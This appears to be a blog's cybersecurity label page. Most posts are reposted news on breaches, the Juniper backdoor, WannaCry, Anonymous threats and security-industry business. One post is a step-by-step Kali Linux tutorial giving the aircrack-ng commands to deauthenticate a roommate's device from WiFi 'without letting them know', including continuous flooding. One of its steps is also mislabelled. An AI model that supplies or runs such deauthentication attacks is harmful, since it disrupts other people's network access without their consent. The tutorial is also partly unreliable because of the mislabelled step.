Showing posts with label cybersecurity. Show all posts
Showing posts with label cybersecurity. Show all posts

Tuesday, 17 October 2017

Cyber Awareness in Daily Life

We all know there is a great need for cyber awareness. We have heard this on TV, read it on Facebook,posted about it, tweeted about it and done many other things about it. But why do we need it? Don't know. Well don't worry, I'll try to make you understand it in an easy way at least that's what I'm trying to accomplish here. But first, let's take a scenario. Consider this. You've recently bought a new house and that includes things that you consider valuable. So, if you do not secure valuables there is a risk that they will get stolen and you'll get cranky,sad and many other similar emotions then take over your subconscious. So to avoid this situation altogether you employ some security measures which is done by professionals who keep in mind the ongoing trends and gadgets that the thieves are using because let's be honest,if we don't do that then it is the same as giving the keys of your precious homes to intruders personally. Now if you've read carefully till now you, must have noticed that the main point was keeping in mind the current trends that the evil guys are using. So, if we take such precautionary measures to secure our homes then why can't we keep ourselves aware of the current trends in Cyber Security when we are living in a digital age where we are surrounded by electronic devices 24/7 throughout the year.
                   So the biggest attack of 2017 is Wannacry and it could have easily been avoided if we all had been aware in terms of Cyber Security of course as in April 2017, Shadow Brokers released an SMB vulnerability named “EternalBlue” which was part of the Microsoft security bulletin MS17-010. The recent WannaCry ransomware takes advantage of this vulnerability to compromise Windows machines, load malware, and propagate to other machines in a network. The attack uses SMB version 1 and TCP port 445 to propagate and it mainly affected systems which were still using Windows XP for which Microsoft had stopped releasing it's security updates since a long time ago. If we take some time and Google the reasons behind the destruction ensured by a cyber attack then we can find the main ingredient was always lack of awareness.There is an age old saying, "Prevention is better than Cure" and the letter P in this saying stands for awareness because how can we prevent Something from happening if we don't know even have the slightest idea about it.

Author's Comment: People will keep on writing articles like this maybe better or less better than this. There are countless more on the web but let's face it the hackers will keep on hacking systems for a long period of time. The reason is there is a tendency in a human beings to not learn lessons until they have suffered and we already know that time is the worst teacher there is as it first takes your test and then it teaches you your lesson. We can keep on writing countless articles this but it's of no use as the people who will probably read it may remember it for some time and then forget about it which is literally how we live. 
Read more ...

Thursday, 22 June 2017

How to kick someone out from WiFi using Kali Linux

Are you fed up of your annoying roommate or flatmates because they are using all the bandwidth of your wifi connection.

Here is the solution for you people to kick out that annoying friend of yours from wifi without letting them know.


this process needs aircrack-ng tool. if you are using any penetration testing linux distro then you don't have to install it. other user have to install this tool.

First open a new terminal and type in ifconfig to find the name of your wireless card.( In my case the name is wlan0)

now take down your wireless card with this command :

ifconfig wlan0 down

Don't worry at the end of this tutorial  I will tell you how to get it back up.

Now we will scan for networks.( we will ger network BSSID and channel)

use this command to scan for netowrks:

aireplay-ng -9 wlan0

Now we will scan for connected devices on the network

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w psk wlan0

-c is for the channel that the network is broadcasting on.

--bssid is for the network mac address we just wrote down.

Now we just wait a few seconds and the devices connected to the network after some time connected devices will show up here with their MAC address.

write down the mac address of the device you want to kick out from your network

Now we will kick the device of our network .

To do that use this command:

aireplay-ng -0 15 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0

-0 means that we will send deAuth packets to the device.

15 is the amount of deAuth packets (if you want to send deAuth packets continously then replace 15 with 0)

-a is to set the networks BSSID which we wrote down earlier.

-c is to set the device's MAC address that you would like to kick of the network.

Great! Now we are sending the deAuth packtes! The devices should now be disconnctes from the network.

Now it's time to back up your wireless card. If your card is down you wouldn't be able to connect to a wifi network.

type in:

ifconfig wlan0 up

Author- Arun Kumar (CEH)

Read more ...

Monday, 5 June 2017

What is the difference between Nessus and OWTF ?

Many of you would be wondering , what is the difference between Nessus and OWTF(Open Web Testing Framework)

First of all Nessus is a Vulnerability Assessment Tool and OWTF is a penetration testing tool.

Secondly Nessus is proprietary to Tenable and OWTF(made by OWASP) is open source and free.

OWTF has both CLI and Web based UI whereas Nessus just has a Web UI, does not have CLI(but it has NASL- Nessus Attack Scripting Language).

Nessus is the world's most popular vulnerability scanner whereas OWTF is relatively new.

Nessus has more than 15000+ plugins whereas OWTF has more than 100+ plugins.

Nessus is available for Windows,MAC,Linux but OWTF is only available for Linux especially OWTF is designed by keeping in mind Kali Lnux.

OWTF runs tools like the Harvester,Nikto,W3AF , Arachini,etc. 

Nessus rates the vulnerability as Critical, High , Medium, Low or Info by using the CVSS score whereas in OWTF the user has to manually rate the vulnerabilites.

Nessus can also be used for auditing purposes whereas OWTF cannot.
Now, to understand this we must first understand that Vulnerability assessment is a part of penetration testing,so what nessus does is find the vulnerabilities of a host whereas OWTF is a tool which is present to automate the task of penetration testing as it will use a number of tools which the penetration tester would have to do manually.

For example, a pen tester would do port scanning to find the open ports in a host using a tool like NMAP and then find the version of the services running in that host , then he vulnerabilities in that service version, then he would try to exploit those vulnerablities using a tool like Metasploit, so what we see here is that the penetration tester is getting output from one tool which he is using as input to other tool.

OWTF does this automatically , runs a tool to get a output , uses that output as input to other tool to move forward in the penetration testing process.

The OWASP OWTF is made in terms of OWASP Pen Testing Guide, Penetration Testing Execution Standard and National Institute of Standards and Technology.
Read more ...

Wednesday, 23 December 2015

Researchers think that a dangerous 'back door' in software used by the US government was caused by the NSA

Juniper is a hardware manufacturer that makes networking equipment. The internet relies on equipment like this to function.
A backdoor is an intentional hole in a security system that allows someone to get in when they shouldn't be able to. Think of a robber slipping in the backdoor of your house because you never lock it.
Juniper announced that it found a backdoor into its systems that it didn't place there. To continue my analogy above, imagine one day you found a new door into your house that you never knew existed, and that you don't even have a key for.
There is speculation that the NSA was responsible for putting this backdoor into Juniper's system, but nothing concrete yet.

Two "back doors" hidden in security software used by US government agencies and corporations that left them open to attack may have been caused by the NSA, security researchers claim.
Last week, news broke about "unauthorised code" in devices sold by Juniper, which builds firewalls, intended to protect the user from attacks and unwanted intrusions. Wired reports that security consultancy Comsecuris' founder Ralf-Phillipp Weinmann's research indicates that the NSA may be responsible for this - by introducing code that was exploitable by others.

Matthew Green, a cryptography lecturer at John Hopkins University, has come to a similar conclusion. In a blog post also outlining the scale of the vulnerability, he wrote:

To sum up, some hacker or group of hackers attacker noticed an existing backdoor in the Juniper software, which may have been intentional or unintentional -- you be the judge! They then piggybacked on top of it to build a backdoor of their own, something they were able to do because all of the hard work had already been done for them. The end result was a period in which someone -- maybe a foreign government -- was able to decrypt Juniper traffic in the U.S. and around the world.

If correct, the NSA likely introduced this back door in order to give them a way to surreptitiously monitor traffic: It allowed them to decrypt otherwise-encrypted data, for a start. But someone else - we don't yet know who - found it, and took advantage.

Juniper has since released patches addressing the vulnerabilities, and is urging customers to upgrade.

This isn't just some abstract theoretical breach. Often, when there's a hack, or leak, or vulnerability, there's no evidence it was ever exploited by anyone other than the security researcher who found it. But in this case, the code was actively put there by an as-yet unknown hacker - and attackers are now actively probing for unpatched Juniper firewalls to exploit.

Researchers at the SANS Internet Storm Center built a "honeypot," PC World reports - that is, a fake server that pretends to be a real Juniper firewall so they can monitor if anyone is fooled into trying to attack it. Sure enough, they say they are "detecting numerous login attempts against our ssh honeypots using the ScreenOS backdoor password."

The Juniper back door comes at a time of heated debate over the ethics and feasibility of introducing back doors into software. As more and more big tech companies (Apple, Google, Facebook, etc.) incorporate strong encryption into their products, there has been a pushback from law enforcement who want to be able to retain access to data and communications when required.

But, technologists and privacy activists counter, any back door will inevitably be open to abuse by third parties. You can't build a back door that only good guys can use, the saying goes. In Juniper, encryption enthusiasts may have found a very powerful example to prove their point.
Read more ...

Monday, 26 October 2015

TalkTalk hires BAE Systems to investigate cyber attack

A man walks past a company logo outside a TalkTalk building in London, Britain October 23, 2015.
British broadband provider TalkTalk said on Sunday it had hired defense company BAE Systems to investigate a cyber attack that may have led to the theft of personal data from its more than 4 million customers.

TalkTalk said on Friday it had received a ransom demand from an unidentified party for the attack, which has led to calls for greater regulation of how companies and public bodies manage personal data.

"BAE Systems are supporting us as we investigate this week's cyber attack," a spokeswoman for TalkTalk said, declining to give further details due to the ongoing investigation.

A spokeswoman for BAE's Applied Intelligence division said the company's cyber-specialists were analyzing "vast quantities" of data to help establish how the breach happened and what information was stolen.

The Metropolitan Police Cyber Crime Unit is also conducting a criminal investigation into the attack.

While TalkTalk said on Saturday it did not believe the information accessed would enable hackers to steal money from its customers, British newspapers on Sunday carried stories of individuals who said callers posing as TalkTalk employees had taken money from their bank accounts.

Many customers took to social media to complain about their treatment following the attack, TalkTalk's third data breach this year, with media also reporting some had been told they faced hundreds of pounds in fees to leave the provider.

Britain's Information Commissioner watchdog, which can impose fines of up to 500,000 pounds ($765,600), has said it is looking into the incident but security experts said the prevalence of cyber crime showed more needed to be done.

Data released by the Office for National Statistics this month showed there were nearly 2.5 million incidents of cyber crime in the year to June 2015.

Simon Moores, chair of the International eCrime Congress and a former government technology ambassador, said so far the commissioner had proved "somewhat toothless".

"The Information Commissioner needs to have more powers to reflect the direction of travel ... at a time of rampant identity theft and exploitation of financial details," Moores told Reuters.

He said Britain should give responsibility for information security to a single minister rather than have it spread across several government departments.

"You need to encourage a culture and a level of responsibility where all large organizations ... take serious ownership and responsibility for the privacy of people’s financial and personal data rather than having a cavalier attitude, which we have seen in so many cases," he said.
Source Reuters
Read more ...

Sunday, 9 August 2015

Russia Hacks Pentagon; Shuts Down Joint Chiefs Of Staff Email System

A Russian cyber attack around July 25 shut down the Pentagon’s Joint Chiefs of Staff’s unclassified email system for 11 days and affected around 4,000 military and civilian personnel who work for the Joint Chiefs. No classified information was taken or put at risk. Only unclassified email accounts were infiltrated.

Lieutenant Colonel Valerie Henderson, Pentagon spokeswoman, told the Daily Mail Online, “Joint Staff unclassified networks for all users are currently down. We continue to identify and mitigate cyber security risks across our networks. With those goals in mind, we have taken the Joint Staff network down and continue to investigate. Our top priority is to restore services as quickly as possible. As a matter of policy and for operational security reasons, we do not comment on the details of cyber incidents or attacks against our networks.”

At a news briefing, Navy Capt. Jeff Davis told reporters that the attack did not threaten military operations since it was limited to the unclassified network. Until the system is resolved, the Joint Staff is operating on an alternative, classified system. The network remains offline; it is expected to be back online before the end of the week.

The US military officials believe that the complexity and advanced nature of the hack strongly suggests that state-sponsored Russian hackers were behind the intrusion on sensitive US government computer networks. The Defense Department disclosed the attack shortly after it occurred but only in recent days have investigators traced it to Russia.

“This attack was fairly sophisticated and has the indications . . . of having come from a state actor such as Russia,” said a US official on the condition of anonymity to discuss details of the investigation.

According to NBC, the sophisticated cyber intrusion relied on an automated system to download large amounts of data and distribute it to thousands of different accounts on the Internet. It’s suspected the hackers used encrypted social media accounts to coordinate the attack. According to The Daily Beast, hackers broke into unclassified email networks by sending emails that initially seemed legitimate, but ended up being malware or ‘spear phishing‘ attempts.

In April, Defence Secretary Ashton Carter had confirmed that Russian hackers had briefly broken into the Pentagon’s unclassified networks. The hackers, believed to have Moscow backing, penetrated both the State Department and White House networks in October 2014. US President Barack Obama’s personal schedule was among the sensitive data that was compromised.

Read more ...

Wednesday, 8 July 2015

Symantec in talks to sell Veritas storage unit to Carlyle: source

Carlyle Group co-founder and CEO David Rubenstein participates in the Washington Ideas Forum, in Washington October 29, 2014.
Software security company Symantec Corp (SYMC.O) is in talks to sell its Veritas data storage business to private equity firm Carlyle Group LP (CG.O), a person familiar with the matter said on Tuesday.

The exact status of the talks could not be learned. Bloomberg News reported earlier that Symantec was nearing a deal to sell Veritas to Carlyle for between $7 billion and $8 billion, citing people with knowledge of the matter.

The Reuters source asked not to be identified because the negotiations are confidential. Symantec did not immediately respond to a request for comment, while Carlyle declined to comment.

Symantec shares rose 2.64 percent in after-hours trading, after closing up 0.5 percent, at $22.79, in regular trade on the Nasdaq.

Symantec has been seeking buyers for Veritas for several months but interest from potential buyers had been limited because of a tax burden associated with splitting the company.

Symantec had been planning separate its business focused on corporate and consumer security software, which had $4.2 billion in revenue last year, from Veritas, which has about $2.5 billion in revenue. It announced the tax-free spinoff last October.

Investor pressure has been building on legacy technology companies such as Symantec to become more agile and capitalize on faster-growing businesses, whether it's through corporate breakups or divestitures.

In addition to Symantec, Hewlett-Packard Co (HPQ.N) and eBay Inc (EBAY.O) have announced major breakups and spinoffs, and more could be on the way. Activist investor Elliott Management has been pressuring EMC Corp (EMC.N) to sell its stake in VMWare (VMW.N) and has urged Citrix Systems (CTXS.O) to create more shareholder value and sell some of its businesses.
Read more ...

China's parliament publishes draft cybersecurity law

China's parliament has published a draft cybersecurity law that consolidates Beijing's control over data, with potentially significant consequences for internet service providers and multinational firms doing business in the country.

The document, dated Monday but picked up by state media on Wednesday, strengthens user privacy protection from hackers and data resellers but simultaneously elevates the government's powers to access, obtain records and block dissemination of private information deemed illegal under Chinese law.

The law has been under discussion in China for months.

Citing the need "to safeguard national cyberspace sovereignty, security and development," the proposed legislation is a milestone in China's effort to bolster its network against threats to the country's stability.

It will also enable the government to better regulate the flow of information in China.

Earlier in July, China's largely rubber stamp parliament passed a sweeping national security law that tightened government control in politics, culture, the military, the economy, technology and the environment.

But cybersecurity has been a particularly irksome area in relations with economic partners like the United States, which sees many recently proposed rules as burdensome or unfair to Silicon Valley firms.

Under the draft law, internet service providers must store data collected within China on Chinese territory; data stored overseas for business purposes must be government-approved. Network equipment must also be approved under testing standards issued by China's cabinet.

The government also reiterated its longstanding objective of requiring internet users to log in with their real names to services like messaging apps - though such drives have failed in the past.

The parliament said government agencies would issue additional guidelines for network security in "critical industries" such as telecoms, energy, transport, finance, national defence and military matters, government administration and other sensitive fields.

Parliament will take feedback on the proposed legislation until Aug. 5.

Source Reuters
Read more ...

Thursday, 2 July 2015

U.S. Intelligence Chief Points Finger at China for Data Hack

James Clapper

Large data breach left millions of Social Security numbers exposed

The most senior U.S. intelligence official has openly implicated China in a large hack of U.S. government data.

James Clapper, the U.S. Director of National Intelligence, said Thursday that China was a “leading suspect” in a recent security breach that saw millions of personnel records of Americans stolen from government computers.

Previously, U.S. officials hadn’t named a suspect for the breach, which was disclosed in early June. Clapper mentioned China at an intelligence conference in Washington, D.C. “You have to kind of salute the Chinese for what they did,” he said, noting the difficulty of the attack.

Earlier this year Barack Obama signed an executive order that grants the Treasury greater ability to impose sanctions on countries who conduct cyberattacks against the U.S. China has denied involvement in the attack, which may have exposed as many as 18 million Social Security numbers.

Source Time 
Read more ...

Wednesday, 17 June 2015

Fed agency blames giant hack on 'neglected' security system

Office of Personnel Management (OPM) Director Katherine Archuleta testifies on Capitol Hill
The agency that allowed hackers linked to China to steal private information about nearly every federal employee — and detailed personal histories of millions with security clearances — failed for years to take basic steps to secure its computer networks, officials acknowledged to Congress on Tuesday.

Democrats and Republicans on the House Oversight and Government Reform Committee spoke in unison to describe their outrage over what they called gross negligence by the Office of Personnel Management. The agency's data was breached last year in two massive cyberattacks only recently revealed.

The criticism came from within, as well. Michael Esser, the agency's assistant inspector general for audit, detailed a yearslong failure by OPM to adhere to reasonable cybersecurity practices, and he said that that for a long time, the people running the agency's information technology had no expertise.

Last year, he said, an inspector general's audit recommended that the agency shut down some of its networks because they were so vulnerable. The director, Katherine Archuleta, declined, saying it would interfere with the agency's mission.

The hackers were already inside her networks, she later acknowledged.

"You failed utterly and totally," said committee Chairman Jason Chaffetz, a Utah Republican. "They recommended it was so bad that you shut it down and you didn't."

Archuleta, stumbling occasionally under withering questions from lawmakers, sought to defend her tenure and portray the agency's problems as decades in the making as its equipment aged. She appeared to cast blame on her recent predecessors, one of whom, John Berry, is the U.S. ambassador to Australia.

Offered chances to apologize and resign, she declined to do either.

Chaffetz said the two breaches "may be the most devastating cyberattack in our nation's history," and said OPM's security policy was akin to leaving its doors and windows unlocked and expecting nothing to be stolen.

"I am as distressed as you are about how long these systems have gone neglected," Archuleta said, adding at another point, "The whole of government is responsible and it will take all of us to solve the issue."

Archuleta and the other witnesses offered few new details about the breaches in the public hearing, deferring most questions about methods and damage to a later, classified session.

After that session, Rep. Elijah Cummings of Maryland, the committee's ranking Democrat, demanded that the committee hear testimony from two OPM contractors, KeyPoint and USIS, that fell victim to hacks last year. Earlier, Cummings and other lawmakers questioned whether the OPM network was compromised first through hacking of the contractors, and OPM officials declined to answer.

During the open hearing, Donna Seymour, the agency's chief information officer, confirmed that personnel information on 4.2 million current and former federal employees had been stolen, not just accessed.

The number of security clearance holders whose data has been taken is not yet known, she said. But the records go back to 1985 and include contractors as well as federal employees. Some government officials estimate the number could be up to 14 million.

And because their security clearance applications contain personal information about friends and family, those people's data is vulnerable as well.

Seymour also disclosed that any federal employees who submitted service history records to OPM, whether or not their personnel records are kept by the agency, likely had their information stolen. That raised the specter that intelligence agency employees who were not kept in the main personnel system for security reasons may have been exposed anyway.

Another fear is that covert intelligence officers working undercover as government employees may have been made vulnerable. If their names are not in the federal employee database, that could be revealing to foreign adversaries; there also could be holes in any bogus employee record built for spying cover purposes.

Andy Ozment, a top Department of Homeland Security cyber official, said the hackers gained access to OPM's network using stolen credentials.

That was important because many lawmakers and outside experts had criticized OPM for failing to take the obvious step of encrypting sensitive data, including Social Security numbers. Ozment said attackers with network credentials could have accessed encrypted data, anyway.

Rep. Will Hurd, a Texas Republican and former covert CIA officer, said he didn't doubt the good intentions of the OPM witnesses, but "the execution has been horrific."

China denies involvement in the cyberattack, and no evidence has been aired publicly proving Chinese involvement although the government says it has "moderate confidence" China was involved.

Lawmakers voiced fears Tuesday that China will seek to gain leverage over Americans with access to secrets by pressuring their overseas relatives and contacts, particularly if they happen to be living in China or another authoritarian country.

"China now has a list of Chinese citizens worldwide who are in close contact with American officials and they can use that for espionage purposes," said Rep. Ron DeSantis, a Florida Republican.

In the cyberattack targeting federal personnel records, hackers are believed to have obtained the Social Security numbers, birth dates, job actions and other private information on every federal employee and millions of former employees and contractors.

In the other attack, which the Obama administration acknowledged on Friday after downplaying the possibility for days, the cyber spies got detailed background information on millions of military, intelligence and other personnel who have been investigated for security clearances.

Applicants for security clearances are required to list drug use, criminal convictions, mental health issues, and the names and addresses of their foreign relatives.

"The 'friends and family' dataset is ultimately the most useful for a hostile intelligence service," said Richard Zahner, a retired lieutenant general and former top NSA official. Tie the information to what's publicly available, and other intelligence the adversary has already collected, "and you have insights that few services have ever achieved."

The personnel records hack comes in a long line of other cyber breaches linked to China and targeting the personal information of Americans, including one in January against health insurer Anthem.

"The United States of America is under attack," Cummings said. "Sophisticated cyber spies, many from foreign countries, are targeting the sensitive personnel information of millions of Americans. They are attacking our government, our economy, our financial sector, our health care systems and virtually every single aspect of our lives."

Source AP
Read more ...

Wednesday, 15 April 2015

Government watchdog says that in-flight WiFi could allow hackers to hijack planes

In a report released earlier this week, U.S. government watchdog group GAO (Government Accountability Office) warned that the increasing connectivity of our aircraft, from flight tracking technologies to in-flight WiFi, could give hackers an access point to tap in and potentially hijack a flight.

“New networking technologies connecting FAA’s ATC information systems expose these systems to new cybersecurity risks, potentially increasing opportunities for systems to be compromised and damaged,” says the GAO.

“Such damage could stem both from attackers seeking to gain access to and move among information systems, and from trusted users of the systems, such as controllers or pilots, who might inadvertently cause harm.”

Speaking with FAA officials and experts, the GAO discovered that older, legacy systems are actually more difficult to access remotely than many modern systems, as the old systems do not connect directly to the FAA over the Internet. On the other hand, the NextGen systems will interoperate with one another, which means that if one system is compromised, others will be at risk as well.

The GAO says that although the FAA is “taking steps” to improve cybersecurity, there is more that can be done to protect our airlines from cyber threats.

“While FAA is working to transform the organization of its cybersecurity efforts,” says the GAO, “the experts we consulted said that it could improve upon those efforts by including all key stakeholders in its agency-wide approach. All 15 of our cybersecurity and aviation experts agreed that organizational clarity regarding roles, responsibilities, and accountability is key to ensuring cybersecurity across the organization.”

Read more ...

Friday, 3 April 2015

EXCLUSIVE: Sophisticated bank transfer cyber scam uncovered by IBM

A worker is pictured behind a logo at the IBM stand on the CeBIT computer fair in Hanover February 26, 2011. The world's largest IT fair CeBIT opens its doors on March 1 and runs through March 5.
IBM has uncovered a sophisticated fraud scheme run by a well- funded Eastern European gang of cyber criminals that uses a combination of phishing, malware and phone calls that the technology company says has netted more than $1 million from large and medium-sized U.S. companies.
The scheme, which IBM security researchers have dubbed "The Dyre Wolf," is small in comparison with more recent widespread online fraud schemes but represents a new level of sophistication.
According to IBM, since last year the attackers have been targeting people working in companies by sending spam email with unsafe attachments to get a variant of the malware known as Dyre into as many computers as possible.
If installed, the malware waits until it recognizes that the user is navigating to a bank website and instantly creates a fake screen telling the user that the bank's site is having problems and to call a certain number.
If users call that number, they get through to an English-speaking operator who already knows what bank the users think they are contacting. The operator then elicits the users' banking details and immediately starts a large wire transfer to take money out of the relevant account.
The use of a live phone operator is what makes the scheme unique, said Caleb Barlow, vice president of IBM Security.
"What's very different in this case, is we saw a pivot of the attackers to use a set of social engineering techniques that I think are unprecedented," said Barlow. "The focus on wire transfers of large sums of money really got our attention."
IBM did not release any details on which companies fell prey to the scheme or the location of the perpetrators.
Once the transfer is complete, the money is then quickly moved from bank to bank to evade detection. In one instance, IBM said, the gang hit the victim company with a denial of service attack - essentially bringing down their Web capabilities - so it would not discover the theft until much later.
International Business Machines Corp's security unit is recommending that companies make sure employees are trained in spotting phishing attacks - where emails or attachments can infect a computer - and to never provide banking credentials to anyone.

The unit published a blog on the issue on its site.
Source Reuters
Read more ...

Tuesday, 31 March 2015

Anonymous Hackers Threaten Israel with 'Electronic-Holocaust' on 7th April

The famous cyber hacker group Anonymous has vowed an 'Electronic Holocaust' against Israel in response to what the group calls 'crimes in the Palestinian territories'.
In a spooky video "message to Israel" posted on YouTube March 4, Anonymous declared yet another cyber attack on April 7, which is one week before Holocaust Remembrance day.

Totally in news delivering style, the video clip shows a man wearing an Anonymous mask and threatening to take down Israeli servers and websites related to critical infrastructure next week, promising to 'erase you from cyberspace'.
"We will erase [Israel] from cyberspace in our electronic Holocaust," says the video. "As we did many times, we will take down your servers, government websites, Israeli military sites, and Israeli institutions."
The cyber activist group declared Palestinians youths as a 'symbol of freedom', and urged them to "never give up. [Anonymous] are with you and will continue to defend you." The group criticized the Israeli government, saying that they have not stopped "endless human right violations" and "illegal settlements."
The video subtitled in Arabic and delivered in English electronic voice, possibly to hide the identity of the real person. The footage includes images of Israeli Prime Minister Benjamin Netanyahu sitting with military leaders and members of his cabinet, as well as images from the Gaza conflict.
The video also shows images of injured Palestinian children and bombed areas that appear to date from Operation Protective Edge conducted by the Israel Defence Forces (IDF) last summer.
"[Israeli government] killed thousands of people, as in the last war against Gaza in 2014. [Israel] have shown that you do NOT respect international law," says the electronic voice, promising "We are coming back to punish you again."
"We always say expect us but you always fail. We are unexpected; we’ll show on 7 April 2015 what the electronic holocaust mean…," the video continues.
Anonymous then continued with a message to the "foolish Benjamin Netanyahu, and all leaders in the Zionist entities" warning that cyber attacks on Israeli government websites, sensitive data and devices will continue "until the people of Palestine are Free."
In past, Anonymous has targeted Israel a number of times. A cyber attack, called OpIsrael attack, in April 2013 claimed to have caused $3 Billion worth of damage to Israel, when the group targeted about 30,000 Israeli bank accounts, 100,000 websites, 5,000 Twitter accounts and over 40,000 Facebook pages.

Sourc The Hacker News

During Operation OpIsrael, Anonymous hacking group published the personal data of 5,000 Israeli officials over the Internet, which included names, ID numbers and personal email addresses.
Past targets of the the hacktivist group includes official websites of the Israeli prime minister, the Bank of Israel, the Israeli Defense Force (IDF), the Embassy of Israel to the United States and the Israeli President’s official website.
Read more ...

Saturday, 21 March 2015

Common data breaches leads to increase in Cyber Security IPO(Initial Public Offering) as companies spend more on security

Rapid7, LogRhythm and Mimecast are joining a growing list of cybersecurity firms planning to go public in 2015 to capitalize on investor interest following a spate of hacker attacks, according to people familiar with the matter.

Shares of publicly traded cybersecurity firms have outperformed the market in recent months, as high-profile data breaches at Sony Corp, JPMorgan Chase & Co and Anthem Inc prompt businesses to spend more to secure their computer networks.

"The cybersecurity market is in the early innings of a massive growth opportunity," said FBR Capital Markets analyst Daniel Ives. "There are many innovative private security vendors. Tech investors' eyes are glued to who has the 'magic solution.'"

Boston-based Rapid7 provides software and services that help businesses assess and monitor security risks. It has more than 3,500 customers, including Inc, American Express Co and Bank of America Corp.

Mimecast, also based in Boston, is an email security firm with 10,000 customers. According to its website, revenue rose 30 percent in 2014 to $88.4 million. LogRhythm Inc, based in Boulder, Colorado, provides technology to help companies monitor activity across their networks.

All three companies are planning to sell shares to the public and seeking valuations in excess of $1 billion, according to people familiar with the matter, who declined to be identified because the plans are not yet public.

Rapid7, whose investors include Bain Capital Ventures and Technology Crossover Ventures, has chosen Morgan Stanley and Barclays to assist with an initial public offering, the people said.

LogRhythm, whose investors include Access Venture Partners, Adam Street Partners, Grotech Ventures and Riverwood Capital, has chosen JPMorgan Chase and Morgan Stanley for an IPO in the second half of the year, the sources said.

Mimecast, whose investors include Insight Venture Partners, Dawn Capital and Index Ventures, has spoken to some investment banks about an IPO later this year but has not hired any firms, the sources said.

Representatives from the three companies and the banks working with them all declined to comment.


With global spending on IT security set to increase 8.2 percent in 2015 to $77 billion, according to market research firm Gartner, the shares of publicly traded cybersecurity firms have done well.

FireEye Inc shares have risen 38 percent so far this year, while Qualys Inc is up 24 percent and Palo Alto Networks Inc has climbed 19 percent. The PureFunds ISE Cyber Security ETF has gained 9 percent over the same period, while the S&P 500 Index is up 1.9 percent.

But investing in cybersecurity is not without risk.

FireEye's share price plunged more than 70 percent in less than three months last year, after Chief Executive Dave DeWalt and other insiders sold shares, spurring investors to take a more critical look at the firm's finances and valuation.

The stock had more than quadrupled in the first six months after its September 2013 IPO, even though FireEye later reported losses of $121 million in 2013 and $444 million in 2014. Analysts do not expect FireEye to post a full-year net profit until 2018, though they are forecasting rapid revenue growth, according to Thomson Reuters data.

Amid investor enthusiasm for the cybersecurity industry, FireEye has recovered this year though at around $42 a share, the stock remains far below its March 2014 high of $97.35.

Rapid7, LogRhythm and Mimecast are not the only cybersecurity firms planning to tap public markets this year.

Veracode, which protects Internet applications from hackers, has selected banks to lead a potential IPO that could value the company at between $600 million and $800 million, Reuters reported in December.

Another company widely expected to debut this year is Bit9 + Carbon Black, whose software protects computers from malware. The firm has not yet hired banks, according to people familiar with the matter. It declined to comment.

According to FBR's Ives, emerging cybersecurity companies could earn a combined annual revenue of $15 billion to $20 billion in three years. That excludes the slower growing but larger market for traditional cybersecurity technology, such as anti-virus software.

Venky Ganesan, managing director at Silicon Valley venture capital firm Menlo Ventures, said average corporate spending on cybersecurity will rise from about 0.25 percent of total revenue to as much as 2 percent of revenue in the coming years.

"The window is wide open for cybersecurity companies. We have a perfect storm of opportunity," said Ganesan, who had invested in Palo Alto Networks while at Globespan Capital.

Source Reuters
Read more ...

Thursday, 12 February 2015

CyberCrime : Masters OF Deception : The gang that really were the kings and ruled the cyberspace but were finally prosecuted!

The original Masters of Deception included: Mark Abene ("Phiber Optik"), Paul Stira ("Scorpion"), Eli Ladopoulos ("Acid Phreak"), HAC, John Lee ("Corrupt") and Julio Fernandez ("Outlaw").

Additional members whose real names are unknown include: Supernigger (also of DPAK), Wing, Nynex Phreak, Billy_The_Kid, Crazy Eddie, The Plague, ZOD, Seeker, Red Knight (who was also a member of Cult of the Dead Cow), Lord Micro, n00gie and peaboy (a.k.a. MCI Sprinter).

Masters of Deception (MOD) was a New York-based group of hackers, most widely known in media for their exploits of telephone company infrastructure and later prosecution, as well as being the subject of the book Masters of Deception: The Gang That Ruled Cyberspace by Josh Quittner.


Masters of Deception operated differently in many respects to previous hacking groups. Although they openly shared information with each other, they took a controversial view on sharing information outside the group. It was believed that access to MOD's knowledge should be earned via degrees of initiation and a proven respect for the craft, rather than releasing powerful information into the wild where it could be used for nefarious purposes. A demonstration of responsibility on the part of the initiate was required. This informal compartmentalized protection of more sensitive knowledge was a structure originally employed by LOD in the 1980s, rather successfully. According to Lex Luthor, "I realized early on that only certain people can be trusted with certain information, and certain types of information can be trusted to no one. Giving out useful things to irresponsible people would inevitably lead to whatever thing it was being abused and no longer useful. I was very possessive of my information and frequently withheld things from my articles."—Phrack #40 interview, 1/8/1992.

Their Story + Origin

MOD's initial membership grew from meetings on Loop-Around Test Lines that led to legendary collaborations to hack RBOC phone switches and the various minicomputers and mainframes used to administer the telephone network. They successfully remained underground using alternative handles to hide even their true hacker identities.

Acid Phreak founded the Masters of Deception with Scorpion and HAC. The name itself was, among other things, a mockery of LOD, as 'M' is one letter up in the alphabet from 'L', although the name originally was a flexible acronym that could be used to identify membership in situations where anonymity would be the best course of action. It could stand for "Millions of Dollars" just as easily as "Masters of Deception."

It is claimed that the mockery of the LOD name was a statement to the underground that LOD had lost its direction. Several LOD members were close friends of MOD who had been raided and indicted by the government, causing the majority of those who remained to drop out of the underground for safety reasons. In their absence, LOD largely fell into disarray causing the disagreement and disillusionment that led Phiber Optik to align himself with MOD in an effort to restore the direction of the spirit of underground hacking.

The Fall of MOD

As a result of a major nationwide investigation by a joint FBI/Secret Service task force, five of MOD's members were indicted in 1992 in federal court. The case was prosecuted by the U.S. Attorney's Office for the Southern District of New York by Assistant U.S. Attorneys Stephen Fishbein and Geoffrey S. Berman.[1] Within the next six months (in 1993), all five pleaded guilty and were sentenced to either probation or prison. After the sentencing of Abene, 2600: The Hacker Quarterly, Winter 1993-94, had on its cover a rag doll labeled "BERMAN" stabbed by a dagger

Source Wikipedia

Read more ...

Friday, 6 February 2015

UK Prime Minister David Cameron has vowed to ban personal encrypted communications apps such as Snapchat and WhatsApp

UK Prime Minister David Cameron has argued that the safety of citizens trumps privacy and that the government should be able to monitor any communications if warranted. If Cameron succeeds," said tech analyst Charles King, "UK citizens can take comfort in their government acting with all the foresight and wisdom of other beacons of freedom, including China, Russia, Egypt and Iran."
By Richard Adhikari
01/15/15 3:03 PM PT

UK Prime Minister David Cameron, who is standing for re-election, has vowed to ban personal encrypted communications apps such as Snapchat and WhatsApp if he is voted in.

He also will allow UK government security agencies to monitor communications, with warrants signed by the Home Secretary.

"The first duty of any government is to keep our country and our people safe," Cameron declared earlier this week.

Myopia Rules, OK!

Cameron's proposal triggered a storm of criticism.

